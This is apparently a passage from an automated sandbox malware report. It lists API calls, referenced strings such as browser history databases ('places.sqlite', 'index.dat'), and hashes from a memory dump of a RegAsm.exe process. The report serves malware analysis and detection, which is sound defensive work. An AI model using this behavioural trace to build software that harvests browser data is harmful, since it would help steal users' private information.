                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID: $$8
                                                                                                                                                                                                • API String ID: 1475443563-435121686
                                                                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                                                                • String ID: }A
                                                                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                                • Opcode ID: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b948c499b3449ea39a97f62b454048eb940a9f441a9691fc400a1ab51a84e12
                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: BINARY
                                                                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 568699880-0
                                                                                                                                                                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1023896661-0
                                                                                                                                                                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: malloc
                                                                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
